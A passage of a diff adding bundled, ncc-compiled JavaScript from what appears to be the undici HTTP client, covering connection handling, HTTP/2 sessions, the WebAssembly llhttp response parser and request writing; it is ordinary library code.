+ if (this[kResuming]) { + // Do nothing. + } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { + // Wait a tick in case stream/iterator is ended in the same tick. 
+ this[kResuming] = 1 + process.nextTick(resume, this) + } else { + resume(this, true) + } + + if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { + this[kNeedDrain] = 2 + } + + return this[kNeedDrain] < 2 + } + + async [kClose] () { + // TODO: for H2 we need to gracefully flush the remaining enqueued + // request and close each stream. + return new Promise((resolve) => { + if (!this[kSize]) { + resolve(null) + } else { + this[kClosedResolve] = resolve + } + }) + } + + async [kDestroy] (err) { + return new Promise((resolve) => { + const requests = this[kQueue].splice(this[kPendingIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + + const callback = () => { + if (this[kClosedResolve]) { + // TODO (fix): Should we error here with ClientDestroyedError? + this[kClosedResolve]() + this[kClosedResolve] = null + } + resolve() + } + + if (this[kHTTP2Session] != null) { + util.destroy(this[kHTTP2Session], err) + this[kHTTP2Session] = null + this[kHTTP2SessionState] = null + } + + if (!this[kSocket]) { + queueMicrotask(callback) + } else { + util.destroy(this[kSocket].on('close', callback), err) + } + + resume(this) + }) + } +} + +function onHttp2SessionError (err) { + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + this[kSocket][kError] = err + + onError(this[kClient], err) +} + +function onHttp2FrameError (type, code, id) { + const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + + if (id === 0) { + this[kSocket][kError] = err + onError(this[kClient], err) + } +} + +function onHttp2SessionEnd () { + util.destroy(this, new SocketError('other side closed')) + util.destroy(this[kSocket], new SocketError('other side closed')) +} + +function onHTTP2GoAway (code) { + const client = this[kClient] + const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) + client[kSocket] = null + client[kHTTP2Session] = null + + if 
(client.destroyed) { + assert(this[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + } else if (client[kRunning] > 0) { + // Fail head of pipeline. + const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', + client[kUrl], + [client], + err + ) + + resume(client) +} + +const constants = __nccwpck_require__(953) +const createRedirectInterceptor = __nccwpck_require__(8861) +const EMPTY_BUF = Buffer.alloc(0) + +async function lazyllhttp () { + const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined + + let mod + try { + mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) + } catch (e) { + /* istanbul ignore next */ + + // We could check if the error was caused by the simd option not + // being enabled, but the occurring of this other error + // * https://github.com/emscripten-core/emscripten/issues/11495 + // got me to remove that check to avoid breaking Node 12. 
+ mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) + } + + return await WebAssembly.instantiate(mod, { + env: { + /* eslint-disable camelcase */ + + wasm_on_url: (p, at, len) => { + /* istanbul ignore next */ + return 0 + }, + wasm_on_status: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_begin: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageBegin() || 0 + }, + wasm_on_header_field: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_header_value: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 + }, + wasm_on_body: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_complete: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageComplete() || 0 + } + + /* eslint-enable camelcase */ + } + }) +} + +let llhttpInstance = null +let llhttpPromise = lazyllhttp() +llhttpPromise.catch() + +let currentParser = null +let currentBufferRef = null +let currentBufferSize = 0 +let currentBufferPtr = null + +const 
TIMEOUT_HEADERS = 1 +const TIMEOUT_BODY = 2 +const TIMEOUT_IDLE = 3 + +class Parser { + constructor (client, socket, { exports }) { + assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) + + this.llhttp = exports + this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) + this.client = client + this.socket = socket + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + this.statusCode = null + this.statusText = '' + this.upgrade = false + this.headers = [] + this.headersSize = 0 + this.headersMaxSize = client[kMaxHeadersSize] + this.shouldKeepAlive = false + this.paused = false + this.resume = this.resume.bind(this) + + this.bytesRead = 0 + + this.keepAlive = '' + this.contentLength = '' + this.connection = '' + this.maxResponseSize = client[kMaxResponseSize] + } + + setTimeout (value, type) { + this.timeoutType = type + if (value !== this.timeoutValue) { + timers.clearTimeout(this.timeout) + if (value) { + this.timeout = timers.setTimeout(onParserTimeout, value, this) + // istanbul ignore else: only for jest + if (this.timeout.unref) { + this.timeout.unref() + } + } else { + this.timeout = null + } + this.timeoutValue = value + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + } + + resume () { + if (this.socket.destroyed || !this.paused) { + return + } + + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_resume(this.ptr) + + assert(this.timeoutType === TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + this.paused = false + this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. 
+ this.readMore() + } + + readMore () { + while (!this.paused && this.ptr) { + const chunk = this.socket.read() + if (chunk === null) { + break + } + this.execute(chunk) + } + } + + execute (data) { + assert(this.ptr != null) + assert(currentParser == null) + assert(!this.paused) + + const { socket, llhttp } = this + + if (data.length > currentBufferSize) { + if (currentBufferPtr) { + llhttp.free(currentBufferPtr) + } + currentBufferSize = Math.ceil(data.length / 4096) * 4096 + currentBufferPtr = llhttp.malloc(currentBufferSize) + } + + new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) + + // Call `execute` on the wasm parser. + // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, + // and finally the length of bytes to parse. + // The return value is an error code or `constants.ERROR.OK`. + try { + let ret + + try { + currentBufferRef = data + currentParser = this + ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) + /* eslint-disable-next-line no-useless-catch */ + } catch (err) { + /* istanbul ignore next: difficult to make a test case for */ + throw err + } finally { + currentParser = null + currentBufferRef = null + } + + const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr + + if (ret === constants.ERROR.PAUSED_UPGRADE) { + this.onUpgrade(data.slice(offset)) + } else if (ret === constants.ERROR.PAUSED) { + this.paused = true + socket.unshift(data.slice(offset)) + } else if (ret !== constants.ERROR.OK) { + const ptr = llhttp.llhttp_get_error_reason(this.ptr) + let message = '' + /* istanbul ignore else: difficult to make a test case for */ + if (ptr) { + const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) + message = + 'Response does not match the HTTP/1.1 protocol (' + + Buffer.from(llhttp.memory.buffer, ptr, len).toString() + + ')' + } + throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) + } + } catch (err) { + 
util.destroy(socket, err) + } + } + + destroy () { + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_free(this.ptr) + this.ptr = null + + timers.clearTimeout(this.timeout) + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + + this.paused = false + } + + onStatus (buf) { + this.statusText = buf.toString() + } + + onMessageBegin () { + const { socket, client } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + if (!request) { + return -1 + } + } + + onHeaderField (buf) { + const len = this.headers.length + + if ((len & 1) === 0) { + this.headers.push(buf) + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + this.trackHeader(buf.length) + } + + onHeaderValue (buf) { + let len = this.headers.length + + if ((len & 1) === 1) { + this.headers.push(buf) + len += 1 + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + const key = this.headers[len - 2] + if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { + this.keepAlive += buf.toString() + } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { + this.connection += buf.toString() + } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { + this.contentLength += buf.toString() + } + + this.trackHeader(buf.length) + } + + trackHeader (len) { + this.headersSize += len + if (this.headersSize >= this.headersMaxSize) { + util.destroy(this.socket, new HeadersOverflowError()) + } + } + + onUpgrade (head) { + const { upgrade, client, socket, headers, statusCode } = this + + assert(upgrade) + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(!socket.destroyed) + assert(socket === client[kSocket]) + assert(!this.paused) + assert(request.upgrade || request.method === 'CONNECT') + + 
this.statusCode = null + this.statusText = '' + this.shouldKeepAlive = null + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + socket.unshift(head) + + socket[kParser].destroy() + socket[kParser] = null + + socket[kClient] = null + socket[kError] = null + socket + .removeListener('error', onSocketError) + .removeListener('readable', onSocketReadable) + .removeListener('end', onSocketEnd) + .removeListener('close', onSocketClose) + + client[kSocket] = null + client[kQueue][client[kRunningIdx]++] = null + client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) + + try { + request.onUpgrade(statusCode, headers, socket) + } catch (err) { + util.destroy(socket, err) + } + + resume(client) + } + + onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { + const { client, socket, headers, statusText } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + + /* istanbul ignore next: difficult to make a test case for */ + if (!request) { + return -1 + } + + assert(!this.upgrade) + assert(this.statusCode < 200) + + if (statusCode === 100) { + util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) + return -1 + } + + /* this can only happen if server is misbehaving */ + if (upgrade && !request.upgrade) { + util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) + return -1 + } + + assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) + + this.statusCode = statusCode + this.shouldKeepAlive = ( + shouldKeepAlive || + // Override llhttp value which does not allow keepAlive for HEAD. + (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') + ) + + if (this.statusCode >= 200) { + const bodyTimeout = request.bodyTimeout != null + ? 
request.bodyTimeout + : client[kBodyTimeout] + this.setTimeout(bodyTimeout, TIMEOUT_BODY) + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + if (request.method === 'CONNECT') { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + if (upgrade) { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (this.shouldKeepAlive && client[kPipelining]) { + const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null + + if (keepAliveTimeout != null) { + const timeout = Math.min( + keepAliveTimeout - client[kKeepAliveTimeoutThreshold], + client[kKeepAliveMaxTimeout] + ) + if (timeout <= 0) { + socket[kReset] = true + } else { + client[kKeepAliveTimeoutValue] = timeout + } + } else { + client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] + } + } else { + // Stop more requests from being dispatched. + socket[kReset] = true + } + + const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false + + if (request.aborted) { + return -1 + } + + if (request.method === 'HEAD') { + return 1 + } + + if (statusCode < 200) { + return 1 + } + + if (socket[kBlocking]) { + socket[kBlocking] = false + resume(client) + } + + return pause ? 
constants.ERROR.PAUSED : 0 + } + + onBody (buf) { + const { client, socket, statusCode, maxResponseSize } = this + + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert.strictEqual(this.timeoutType, TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + assert(statusCode >= 200) + + if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { + util.destroy(socket, new ResponseExceededMaxSizeError()) + return -1 + } + + this.bytesRead += buf.length + + if (request.onData(buf) === false) { + return constants.ERROR.PAUSED + } + } + + onMessageComplete () { + const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this + + if (socket.destroyed && (!statusCode || shouldKeepAlive)) { + return -1 + } + + if (upgrade) { + return + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(statusCode >= 100) + + this.statusCode = null + this.statusText = '' + this.bytesRead = 0 + this.contentLength = '' + this.keepAlive = '' + this.connection = '' + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (statusCode < 200) { + return + } + + /* istanbul ignore next: should be handled by llhttp? */ + if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { + util.destroy(socket, new ResponseContentLengthMismatchError()) + return -1 + } + + request.onComplete(headers) + + client[kQueue][client[kRunningIdx]++] = null + + if (socket[kWriting]) { + assert.strictEqual(client[kRunning], 0) + // Response completed before request. 
+ util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (!shouldKeepAlive) { + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (socket[kReset] && client[kRunning] === 0) { + // Destroy socket once all requests have completed. + // The request at the tail of the pipeline is the one + // that requested reset and no further requests should + // have been queued since then. + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (client[kPipelining] === 1) { + // We must wait a full event loop cycle to reuse this socket to make sure + // that non-spec compliant servers are not closing the connection even if they + // said they won't. + setImmediate(resume, client) + } else { + resume(client) + } + } +} + +function onParserTimeout (parser) { + const { socket, timeoutType, client } = parser + + /* istanbul ignore else */ + if (timeoutType === TIMEOUT_HEADERS) { + if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { + assert(!parser.paused, 'cannot be paused while waiting for headers') + util.destroy(socket, new HeadersTimeoutError()) + } + } else if (timeoutType === TIMEOUT_BODY) { + if (!parser.paused) { + util.destroy(socket, new BodyTimeoutError()) + } + } else if (timeoutType === TIMEOUT_IDLE) { + assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) + util.destroy(socket, new InformationalError('socket idle timeout')) + } +} + +function onSocketReadable () { + const { [kParser]: parser } = this + if (parser) { + parser.readMore() + } +} + +function onSocketError (err) { + const { [kClient]: client, [kParser]: parser } = this + + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + if (client[kHTTPConnVersion] !== 'h2') { + // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded + // to the user. 
+ if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so for as a valid response. + parser.onMessageComplete() + return + } + } + + this[kError] = err + + onError(this[kClient], err) +} + +function onError (client, err) { + if ( + client[kRunning] === 0 && + err.code !== 'UND_ERR_INFO' && + err.code !== 'UND_ERR_SOCKET' + ) { + // Error is not caused by running request and not a recoverable + // socket error. + + assert(client[kPendingIdx] === client[kRunningIdx]) + + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + assert(client[kSize] === 0) + } +} + +function onSocketEnd () { + const { [kParser]: parser, [kClient]: client } = this + + if (client[kHTTPConnVersion] !== 'h2') { + if (parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + return + } + } + + util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) +} + +function onSocketClose () { + const { [kClient]: client, [kParser]: parser } = this + + if (client[kHTTPConnVersion] === 'h1' && parser) { + if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + } + + this[kParser].destroy() + this[kParser] = null + } + + const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) + + client[kSocket] = null + + if (client.destroyed) { + assert(client[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { + // Fail head of pipeline. 
+ const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', client[kUrl], [client], err) + + resume(client) +} + +async function connect (client) { + assert(!client[kConnecting]) + assert(!client[kSocket]) + + let { host, hostname, protocol, port } = client[kUrl] + + // Resolve ipv6 + if (hostname[0] === '[') { + const idx = hostname.indexOf(']') + + assert(idx !== -1) + const ip = hostname.substring(1, idx) + + assert(net.isIP(ip)) + hostname = ip + } + + client[kConnecting] = true + + if (channels.beforeConnect.hasSubscribers) { + channels.beforeConnect.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector] + }) + } + + try { + const socket = await new Promise((resolve, reject) => { + client[kConnector]({ + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, (err, socket) => { + if (err) { + reject(err) + } else { + resolve(socket) + } + }) + }) + + if (client.destroyed) { + util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) + return + } + + client[kConnecting] = false + + assert(socket) + + const isH2 = socket.alpnProtocol === 'h2' + if (isH2) { + if (!h2ExperimentalWarned) { + h2ExperimentalWarned = true + process.emitWarning('H2 support is experimental, expect them to change at any time.', { + code: 'UNDICI-H2' + }) + } + + const session = http2.connect(client[kUrl], { + createConnection: () => socket, + peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams + }) + + client[kHTTPConnVersion] = 'h2' + session[kClient] = client + session[kSocket] = socket + session.on('error', onHttp2SessionError) + session.on('frameError', onHttp2FrameError) + 
session.on('end', onHttp2SessionEnd) + session.on('goaway', onHTTP2GoAway) + session.on('close', onSocketClose) + session.unref() + + client[kHTTP2Session] = session + socket[kHTTP2Session] = session + } else { + if (!llhttpInstance) { + llhttpInstance = await llhttpPromise + llhttpPromise = null + } + + socket[kNoRef] = false + socket[kWriting] = false + socket[kReset] = false + socket[kBlocking] = false + socket[kParser] = new Parser(client, socket, llhttpInstance) + } + + socket[kCounter] = 0 + socket[kMaxRequests] = client[kMaxRequests] + socket[kClient] = client + socket[kError] = null + + socket + .on('error', onSocketError) + .on('readable', onSocketReadable) + .on('end', onSocketEnd) + .on('close', onSocketClose) + + client[kSocket] = socket + + if (channels.connected.hasSubscribers) { + channels.connected.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + socket + }) + } + client.emit('connect', client[kUrl], [client]) + } catch (err) { + if (client.destroyed) { + return + } + + client[kConnecting] = false + + if (channels.connectError.hasSubscribers) { + channels.connectError.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + error: err + }) + } + + if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { + assert(client[kRunning] === 0) + while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { + const request = client[kQueue][client[kPendingIdx]++] + errorRequest(client, request, err) + } + } else { + onError(client, err) + } + + client.emit('connectionError', client[kUrl], [client], err) + } + + resume(client) +} + +function emitDrain (client) { + client[kNeedDrain] = 0 + client.emit('drain', client[kUrl], [client]) +} + +function resume (client, sync) { 
+ if (client[kResuming] === 2) { + return + } + + client[kResuming] = 2 + + _resume(client, sync) + client[kResuming] = 0 + + if (client[kRunningIdx] > 256) { + client[kQueue].splice(0, client[kRunningIdx]) + client[kPendingIdx] -= client[kRunningIdx] + client[kRunningIdx] = 0 + } +} + +function _resume (client, sync) { + while (true) { + if (client.destroyed) { + assert(client[kPending] === 0) + return + } + + if (client[kClosedResolve] && !client[kSize]) { + client[kClosedResolve]() + client[kClosedResolve] = null + return + } + + const socket = client[kSocket] + + if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { + if (client[kSize] === 0) { + if (!socket[kNoRef] && socket.unref) { + socket.unref() + socket[kNoRef] = true + } + } else if (socket[kNoRef] && socket.ref) { + socket.ref() + socket[kNoRef] = false + } + + if (client[kSize] === 0) { + if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { + socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) + } + } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { + if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { + const request = client[kQueue][client[kRunningIdx]] + const headersTimeout = request.headersTimeout != null + ? 
request.headersTimeout + : client[kHeadersTimeout] + socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) + } + } + } + + if (client[kBusy]) { + client[kNeedDrain] = 2 + } else if (client[kNeedDrain] === 2) { + if (sync) { + client[kNeedDrain] = 1 + process.nextTick(emitDrain, client) + } else { + emitDrain(client) + } + continue + } + + if (client[kPending] === 0) { + return + } + + if (client[kRunning] >= (client[kPipelining] || 1)) { + return + } + + const request = client[kQueue][client[kPendingIdx]] + + if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { + if (client[kRunning] > 0) { + return + } + + client[kServerName] = request.servername + + if (socket && socket.servername !== request.servername) { + util.destroy(socket, new InformationalError('servername changed')) + return + } + } + + if (client[kConnecting]) { + return + } + + if (!socket && !client[kHTTP2Session]) { + connect(client) + return + } + + if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { + return + } + + if (client[kRunning] > 0 && !request.idempotent) { + // Non-idempotent request cannot be retried. + // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { + // Don't dispatch an upgrade until all preceding requests have completed. + // A misbehaving server might upgrade the connection before all pipelined + // request has completed. + return + } + + if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && + (util.isStream(request.body) || util.isAsyncIterable(request.body))) { + // Request with stream or iterator body can error while other requests + // are inflight and indirectly error those as well. + // Ensure this doesn't happen by waiting for inflight + // to complete before dispatching. + + // Request with stream or iterator body cannot be retried. 
+ // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (!request.aborted && write(client, request)) { + client[kPendingIdx]++ + } else { + client[kQueue].splice(client[kPendingIdx], 1) + } + } +} + +// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 +function shouldSendContentLength (method) { + return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' +} + +function write (client, request) { + if (client[kHTTPConnVersion] === 'h2') { + writeH2(client, client[kHTTP2Session], request) + return + } + + const { body, method, path, host, upgrade, headers, blocking, reset } = request + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + const bodyLength = util.bodyLength(body) + + let contentLength = bodyLength + + if (contentLength === null) { + contentLength = request.contentLength + } + + if (contentLength === 0 && !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. + + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. 
+ if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + const socket = client[kSocket] + + try { + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + + util.destroy(socket, new InformationalError('aborted')) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + if (method === 'HEAD') { + // https://github.com/mcollina/undici/issues/258 + // Close after a HEAD request to interop with misbehaving servers + // that may send a body in the response. + + socket[kReset] = true + } + + if (upgrade || method === 'CONNECT') { + // On CONNECT or upgrade, block pipeline from dispatching further + // requests on this connection. 
+ + socket[kReset] = true + } + + if (reset != null) { + socket[kReset] = reset + } + + if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { + socket[kReset] = true + } + + if (blocking) { + socket[kBlocking] = true + } + + let header = `${method} ${path} HTTP/1.1\r\n` + + if (typeof host === 'string') { + header += `host: ${host}\r\n` + } else { + header += client[kHostHeader] + } + + if (upgrade) { + header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` + } else if (client[kPipelining] && !socket[kReset]) { + header += 'connection: keep-alive\r\n' + } else { + header += 'connection: close\r\n' + } + + if (headers) { + header += headers + } + + if (channels.sendHeaders.hasSubscribers) { + channels.sendHeaders.publish({ request, headers: header, socket }) + } + + /* istanbul ignore else: assertion */ + if (!body || bodyLength === 0) { + if (contentLength === 0) { + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + assert(contentLength === null, 'no body must not have content length') + socket.write(`${header}\r\n`, 'latin1') + } + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(body) + socket.uncork() + request.onBodySent(body) + request.onRequestSent() + if (!expectsPayload) { + socket[kReset] = true + } + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { + writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) + } else { + writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) + } + } else if (util.isStream(body)) { + writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) + } else if (util.isIterable(body)) { + writeIterable({ body, client, request, socket, contentLength, 
header, expectsPayload }) + } else { + assert(false) + } + + return true +} + +function writeH2 (client, session, request) { + const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request + + let headers + if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) + else headers = reqHeaders + + if (upgrade) { + errorRequest(client, request, new Error('Upgrade not supported for H2')) + return false + } + + try { + // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + /** @type {import('node:http2').ClientHttp2Stream} */ + let stream + const h2State = client[kHTTP2SessionState] + + headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] + headers[HTTP2_HEADER_METHOD] = method + + if (method === 'CONNECT') { + session.ref() + // we are already connected, streams are pending, first request + // will create a new stream. 
We trigger a request to create the stream and wait until + // `ready` event is triggered + // We disabled endStream to allow the user to write to the stream + stream = session.request(headers, { endStream: false, signal }) + + if (stream.id && !stream.pending) { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + } else { + stream.once('ready', () => { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + }) + } + + stream.once('close', () => { + h2State.openStreams -= 1 + // TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) session.unref() + }) + + return true + } + + // https://tools.ietf.org/html/rfc7540#section-8.3 + // :path and :scheme headers must be omited when sending CONNECT + + headers[HTTP2_HEADER_PATH] = path + headers[HTTP2_HEADER_SCHEME] = 'https' + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + let contentLength = util.bodyLength(body) + + if (contentLength == null) { + contentLength = request.contentLength + } + + if (contentLength === 0 || !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // 